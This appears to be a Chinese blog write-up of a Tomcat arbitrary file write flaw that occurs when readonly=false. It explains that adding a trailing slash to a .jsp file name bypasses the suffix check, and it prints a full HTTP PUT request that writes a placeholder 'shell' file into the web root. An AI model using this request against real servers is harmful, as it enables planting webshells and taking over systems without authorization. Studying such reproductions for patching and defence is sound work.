漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件.
虽然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用/)来绕过了限制。
直接发送以下数据包即可在Web根目录写入shell:
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
this is shell
如下:
结果:
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
yangroupaomo
发表于 2021-10-15
666
评论列表
加载数据中...